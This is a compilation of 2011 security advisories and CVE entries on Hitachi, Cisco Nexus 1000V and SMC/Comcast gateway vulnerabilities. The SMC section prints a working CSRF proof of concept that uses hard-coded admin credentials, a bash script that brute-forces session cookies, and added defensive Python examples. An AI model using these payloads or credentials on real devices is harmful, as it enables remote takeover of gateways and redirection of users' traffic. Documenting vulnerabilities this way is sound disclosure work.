----------------------------------------------------------------------
TITLE:
Hitachi Tuning Manager Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA43209
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43209/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
RELEASE DATE:
2011-02-08
DISCUSS ADVISORY:
http://secunia.com/advisories/43209/#comments
DESCRIPTION:
A vulnerability has been reported in Hitachi Tuning Manager, which
can be exploited by malicious people to conduct cross-site scripting
attacks.
Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and
7.0.0 running on Windows and Solaris.
SOLUTION:
Update to version 6.4.0-02 or 7.0.0-01.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-002:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html
| VAR-201102-0213 | CVE-2011-0355 | Cisco Nexus 1000V Virtual Ethernet Module Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition.
The following Cisco products are vulnerable:
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1)
The following VMware products are vulnerable:
ESXi 4.1
ESXi 4.0
ESX 4.1
ESX 4.0.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0002
Synopsis: Cisco Nexus 1000V VEM updates address denial of
service in VMware ESX/ESXi
Issue date: 2011-02-07
Updated on: 2011-02-07 (initial release of advisory)
CVE numbers: CVE-2011-0355
- ------------------------------------------------------------------------
1. Summary
Updated versions of the Cisco Nexus 1000V virtual switch address a
denial of service in VMware ESX/ESXi.
2. Problem Description
a. This switch can be added to ESX and ESXi
where it replaces the VMware virtual switch and runs as part of the
ESX and ESXi kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-0355 to the issue.
VMware customers are only affected by this vulnerability if they
have chosen to deploy the Cisco Nexus 1000V virtual switch as a
replacement for the VMware vNetwork Standard Switch or the VMware
vNetwork Distributed Switch.
VMware has confirmed that the VMware vNetwork Standard Switch and
the VMware vNetwork Distributed Switch are not affected by the
vulnerability.
The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see
section 5 for a link).
4. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355
Cisco bug ID CSCtj17451 (registered Cisco customers only)
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtj17451
- ------------------------------------------------------------------------
6.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFNUNTIS2KysvBH1xkRAk1hAJ9iH1j58lM5KrwVaRYccSN3rWaw/wCePyLP
FHYGA7W1DEcKcOFWj7GkuHE=
=srWD
-----END PGP SIGNATURE-----
TITLE:
Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of
Service
SECUNIA ADVISORY ID:
SA43084
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43084/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43084/#comments
DESCRIPTION:
A vulnerability has been reported in Cisco Nexus 1000V, which can be
exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when processing 802.1Q
tagged packets. This can be exploited to cause a crash when a virtual
machine sends a packet on a vEthernet port.
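The trigger is an 802.1Q-tagged frame arriving on a vEthernet port configured as an access port, a frame the switch should simply drop. As an added example, not Cisco or VMware code, the following Python parses an Ethernet frame, recognises the 802.1Q tag and applies the access/trunk rule a virtual switch is expected to enforce. The port model (a dict with a mode and a VLAN or allowed set), the decision to treat the 0x88A8 TPID like 0x8100, and the sample frames are all constructed for illustration.

```python
import struct

# Added example (not Cisco/VMware code): parse an Ethernet frame, detect an
# 802.1Q tag, and apply the rule the VEM should have enforced on an access
# vEthernet port: drop tagged frames instead of mishandling them.
ETHERTYPE_VLAN = 0x8100
ETHERTYPE_QINQ = 0x88A8   # assumption: treat the service-tag TPID like 0x8100


def parse_ethernet(frame):
    """Return dst, src, vlan (None when untagged), pcp, ethertype and payload."""
    if len(frame) < 14:
        raise ValueError("runt frame")
    dst, src, ethertype = struct.unpack_from("!6s6sH", frame, 0)
    offset = 14
    vlan = pcp = None
    if ethertype in (ETHERTYPE_VLAN, ETHERTYPE_QINQ):
        if len(frame) < 18:
            raise ValueError("truncated 802.1Q tag")
        tci, ethertype = struct.unpack_from("!HH", frame, 14)   # TCI, inner ethertype
        pcp = tci >> 13            # 3-bit priority code point
        vlan = tci & 0x0FFF        # 12-bit VLAN ID (0 = priority-tagged)
        offset = 18
    return {"dst": dst, "src": src, "vlan": vlan, "pcp": pcp,
            "ethertype": ethertype, "payload": frame[offset:]}


def port_decision(frame, port):
    """port is {"mode": "access", "vlan": N} or
    {"mode": "trunk", "allowed": {..}, "native": N (optional)}.
    Returns ("forward", vlan) or ("drop", reason)."""
    hdr = parse_ethernet(frame)
    if port["mode"] == "access":
        if hdr["vlan"] is not None:
            return ("drop", "802.1Q tag on access port")
        return ("forward", port["vlan"])
    if hdr["vlan"] is None:
        return ("forward", port.get("native", 1))
    if hdr["vlan"] in port["allowed"]:
        return ("forward", hdr["vlan"])
    return ("drop", f"vlan {hdr['vlan']} not allowed on trunk")


def build_frame(dst, src, payload, vlan=None, pcp=0, ethertype=0x0800):
    """Constructed test input: an optionally tagged frame carrying `payload`."""
    head = struct.pack("!6s6s", dst, src)
    if vlan is not None:
        head += struct.pack("!HHH", ETHERTYPE_VLAN, (pcp << 13) | vlan, ethertype)
    else:
        head += struct.pack("!H", ethertype)
    return head + payload
```

A guest that can inject raw frames (anything with CAP_NET_RAW or a pcap-capable tool) can produce the tagged frame, which is why the CVE scores the attack as coming from a guest OS user rather than from the network.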
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Cisco (CSCtj17451):
http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html
| VAR-201102-0084 | CVE-2011-0886 | SMC SMCD3G-CCR of Web Cross-site request forgery vulnerability in the interface |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected.
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password "D0nt4g3tme". These credentials are not
disclosed to the customer as part of the device installation and customers
are not advised to change them, so the majority of users are unaware of
the default configuration.
With these default credentials, an attacker on the internal network can
modify the device configuration to stage more significant attacks,
including redirection of DNS requests, creation of a remote VPN termination
point, and modification of NAT entries. The credentials grant access to the
web management interface as well as to a telnet interface that provides
shell access to the device; the mso login yields a shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages, allowing an attacker to embed in a web page a
malicious request against the gateway's management interface. Through
this, an attacker can modify the device configuration and enable remote
administration via a telnet shell and HTTP.
The following Proof of Concept (PoC) logs the victim's browser into the
gateway, changes the remote administration settings so that any external
address may connect, and changes the DNS settings.
## smcd3g-csrf-poc.htm
<!-- Loader page: three hidden iframes fire the login, the remote-admin
     change and the DNS change. poc-2 and poc-3 delay their submits so
     that the login in poc-1 completes first. -->
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"></iframe>
</body>
</html>
## smcd3g-csrf-poc-1.htm
<!-- Logs the victim's browser into the gateway with the static mso
     credentials from Finding 1, so no existing session is required. -->
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post" name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form>
<script> document.tF.submit(); </script>
</body>
</html>
## smcd3g-csrf-poc-2.htm
<!-- Enables remote administration over HTTP (8080), HTTPS (8181) and
     telnet (2323) for any source address; the 4 s delay lets the login
     in poc-1 finish first. -->
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post">
<input type="hidden" name="file" value="feat-admin-remote" />
<input type="hidden" name="dir" value="admin/" />
<input type="hidden" name="RemoteRange" value="0" />
<input type="hidden" name="rm_access" value="on" />
<input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" />
<input type="hidden" name="http_port" value="8080" />
<input type="hidden" name="http_enable" value="on" />
<input type="hidden" name="http_flag" value="1" />
<input type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" />
<input type="hidden" name="telnet_enable" value="on" />
<input type="hidden" name="telnet_port" value="2323" />
<input type="hidden" name="telnet_flag" value="1" />
<input type="hidden" name="Remote1=" value="" />
</form>
<script> setTimeout("document.RMangement.submit()", 4000); </script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<!-- Switches the WAN DNS settings to fixed, attacker-chosen resolvers
     (4.2.2.1 / 4.2.2.2 as placeholders); submitted 5 s after load. -->
<html>
<body>
<form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post">
<input type="hidden" name="file" value="feat-wan-ip" />
<input type="hidden" name="dir" value="admin/" />
<input type="hidden" name="DNSAssign" value="Fixed" />
<input type="hidden" name="dhcpc_release" value="0" />
<input type="hidden" name="dhcpc_renew" value="0" />
<input type="hidden" name="domain_name" value="" />
<input type="hidden" name="WDn" value="" />
<input type="hidden" name="SysName" value="" />
<input type="hidden" name="manual_dns_enable" value="on" />
<input type="hidden" name="DAddr" value="4.2.2.1" />
<input type="hidden" name="DAddr0" value="4" />
<input type="hidden" name="DAddr1" value="2" />
<input type="hidden" name="DAddr2" value="2" />
<input type="hidden" name="DAddr3" value="1" />
<input type="hidden" name="PDAddr" value="4.2.2.2" />
<input type="hidden" name="PDAddr0" value="4" />
<input type="hidden" name="PDAddr1" value="2" />
<input type="hidden" name="PDAddr2" value="2" />
<input type="hidden" name="PDAddr3" value="2" />
</form>
<script> setTimeout("document.WanIPform.submit()", 5000); </script>
</body>
</html>
If the PoC were embedded in any web page the targeted user visited while
logged into the device (or, because the first frame performs the login with
the static credentials from Finding 1, simply while on the gateway's LAN),
the attacker would gain remote administration of the gateway, including a
telnet shell, and could redirect traffic to a malicious endpoint.
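The check the gateway's /goform/ handlers lacked, as an added example that is not part of the Trustwave advisory or the SMC firmware: a Python model of a state-changing handler, first with the pre-fix behaviour (any POST carrying a valid userid cookie is honoured) and then with a same-origin check on the Origin/Referer header plus a per-session anti-CSRF token. The Request and Session classes, the csrf_token form field, the attacker.example origin and the login_allowed rule are assumptions made for the example; the form fields and the 10.1.10.1 address come from the PoC above. The advisory does not describe how firmware 1.4.0.49.2 actually fixed the issue.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

GATEWAY_HOST = "10.1.10.1"   # LAN address of the gateway, as in the PoC


@dataclass
class Request:
    """Only the parts of an HTTP request the checks look at (constructed)."""
    method: str
    path: str
    headers: dict
    cookies: dict
    form: dict


@dataclass
class Session:
    userid: str
    # Assumed fix: a per-session secret embedded in the gateway's own forms.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def vulnerable_check(req: Request, sessions: dict) -> bool:
    """Pre-fix behaviour: a POST is honoured whenever the browser attaches a
    valid userid cookie. The browser attaches it automatically, which is
    exactly what smcd3g-csrf-poc-2.htm relies on."""
    return req.method == "POST" and req.cookies.get("userid") in sessions


def origin_is_gateway(req: Request) -> bool:
    """Source check: browsers add Origin (or at least Referer) to form POSTs,
    and a page on another site cannot set either to the gateway's address."""
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if not source:
        return False   # fail closed: no provenance, no state change
    return urlsplit(source).hostname == GATEWAY_HOST


def token_matches(req: Request, session: Session) -> bool:
    """Token check: the same-origin policy stops the attacker's page from
    reading the gateway's forms, so a forged POST cannot carry the token."""
    supplied = req.form.get("csrf_token", "")
    return hmac.compare_digest(supplied.encode(), session.csrf_token.encode())


def hardened_check(req: Request, sessions: dict) -> bool:
    """Accept a state-changing POST only from the gateway's own pages,
    with a valid session and a matching token."""
    if req.method != "POST":
        return False
    session = sessions.get(req.cookies.get("userid"))
    if session is None:
        return False
    return origin_is_gateway(req) and token_matches(req, session)


def login_allowed(req: Request) -> bool:
    """No session exists yet when /goform/login is hit, so a session token
    cannot help; the source check alone must stop the forged login in poc-1."""
    return req.method == "POST" and origin_is_gateway(req)


def demo() -> dict:
    session = Session(userid="1267604200")
    sessions = {session.userid: session}
    poc_fields = {"file": "feat-admin-remote", "dir": "admin/",
                  "telnet_enable": "on", "telnet_port": "2323"}
    # As sent by poc-2: victim's cookie attached by the browser, Origin is the
    # attacker's page (constructed name), no token in the copied form.
    forged = Request("POST", "/goform/RemoteRange",
                     {"Origin": "http://attacker.example"},
                     {"userid": session.userid}, dict(poc_fields))
    # The same change submitted from the gateway's own admin page.
    legit = Request("POST", "/goform/RemoteRange",
                    {"Origin": "http://10.1.10.1"},
                    {"userid": session.userid},
                    {**poc_fields, "csrf_token": session.csrf_token})
    # As sent by poc-1: the static mso credentials posted from a foreign page.
    forged_login = Request("POST", "/goform/login",
                           {"Referer": "http://attacker.example/poc.htm"},
                           {}, {"user": "mso", "pws": "D0nt4g3tme"})
    return {
        "vulnerable_accepts_forged": vulnerable_check(forged, sessions),
        "hardened_accepts_forged": hardened_check(forged, sessions),
        "hardened_accepts_legit": hardened_check(legit, sessions),
        "forged_login_allowed": login_allowed(forged_login),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The two checks cover different failure modes: the token survives a proxy that strips Origin and Referer (the source check then fails closed), while the source check is the only thing that can protect the login handler, where no session and therefore no token exists yet. Both are needed here because poc-1 shows that the attacker can create the session with the static credentials rather than waiting for the victim to log in.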
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast use a predictable value to
validate the active web management portal session: the epoch time at which
the session began is stored in a cookie named "userid". This yields a small,
predictable range of session IDs that can be brute-forced.
The following PoC requests the admin page with an incrementing userid cookie
and treats any response that does not redirect to login.asp as a valid
session ID.
## smcd3g-session-poc.sh
#!/bin/bash
# Candidate range: epoch seconds around the time the victim's session began
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++ )); do
  # A valid userid cookie returns the admin page; an invalid one is
  # redirected to login.asp, so a response without "login.asp" is a hit
  if [ "$(curl -sb "userid=$i" http://10.1.10.1/admin/index.asp | grep -c login.asp)" -lt 1 ]; then
    echo "Session ID Found: $i"
  fi
  if [ $((i % 100)) -eq 0 ]; then
    echo "Currently at $i"
  fi
done
Through this, an attacker can brute-force the set of possible valid session
IDs. Sessions expire within 10 minutes by default, so the attack window is
limited, but the attack can be combined with other methods.
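To make the size of that search space concrete, the following is an added example (not code from the advisory) that simulates the userid cookie scheme in Python: a session store that issues the login epoch second as the identifier, the PoC's brute-force loop run against it in-process, and a replacement store that issues 128 random bits from the OS CSPRNG. The class and function names, the 600-second window derived from the 10-minute expiry, and the login time (the PoC's start value) are assumptions for the example; no network requests are made.

```python
import math
import secrets


class TimeBasedSessionStore:
    """Models the pre-1.4.0.49.2 behaviour from Finding 3: the session
    identifier handed out as the userid cookie is the epoch second at which
    the session started (assumed 600 s lifetime, "within 10 minutes")."""

    TTL = 600

    def __init__(self):
        self._expiry = {}  # userid -> epoch second at which it stops validating

    def login(self, now: int) -> str:
        userid = str(now)
        self._expiry[userid] = now + self.TTL
        return userid

    def is_valid(self, userid: str, now: int) -> bool:
        """What /admin/index.asp decides: serve the page or redirect to login.asp."""
        expiry = self._expiry.get(userid)
        return expiry is not None and now < expiry


class RandomSessionStore(TimeBasedSessionStore):
    """Same interface, but the identifier is 128 bits from the OS CSPRNG,
    so it bears no relation to the clock."""

    def login(self, now: int) -> str:
        userid = secrets.token_hex(16)
        self._expiry[userid] = now + self.TTL
        return userid


def brute_force(store, now: int, window: int = TimeBasedSessionStore.TTL):
    """The PoC loop, run in-process. Any live session must have started within
    the last `window` seconds, so at most `window` guesses are needed. Guesses
    run backwards from `now` because the newest sessions are the ones most
    likely to be alive. Returns (userid or None, guesses made)."""
    for guesses, candidate in enumerate(range(now, now - window, -1), start=1):
        if store.is_valid(str(candidate), now):
            return str(candidate), guesses
    return None, window


def search_space_bits(store_cls) -> float:
    """log2 of the candidates the attacker must cover inside the TTL window."""
    if store_cls is TimeBasedSessionStore:
        return math.log2(TimeBasedSessionStore.TTL)   # about 9.2 bits
    return 128.0                                       # token_hex(16)


def demo(login_time: int = 1267604160, delay: int = 240) -> dict:
    """Victim logs in at `login_time`; the attacker starts guessing `delay`
    seconds later without knowing the exact login time."""
    now = login_time + delay

    weak = TimeBasedSessionStore()
    weak.login(login_time)
    weak_found, weak_guesses = brute_force(weak, now)

    strong = RandomSessionStore()
    strong.login(login_time)
    strong_found, strong_guesses = brute_force(strong, now)

    return {
        "weak_found": weak_found,          # "1267604160": the victim's cookie
        "weak_guesses": weak_guesses,      # delay + 1 requests
        "strong_found": strong_found,      # None: clock guesses never match
        "strong_guesses": strong_guesses,  # whole window exhausted
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
    print(f"time-based search space: {search_space_bits(TimeBasedSessionStore):.1f} bits")
    print(f"random search space:     {search_space_bits(RandomSessionStore):.1f} bits")
```

With a 10-minute lifetime the time-based scheme offers roughly nine bits of uncertainty, and the attacker's cost is one request per second of elapsed session age, which is why the advisory's 1,800-second loop is enough. The random store keeps the same expiry logic; only the identifier changes, and the same loop exhausts its window without a hit.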
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0085 | CVE-2011-0887 | SMC SMCD3G-CCR web management portal vulnerable to session hijacking |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected.
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
RELEASE DATE:
2011-03-05
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
| VAR-201102-0083 | CVE-2011-0885 | SMC SMCD3G-CCR in a specific Comcast Business Gateway configuration: default credentials grant administrative access |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected.
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
RELEASE DATE:
2011-03-05
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
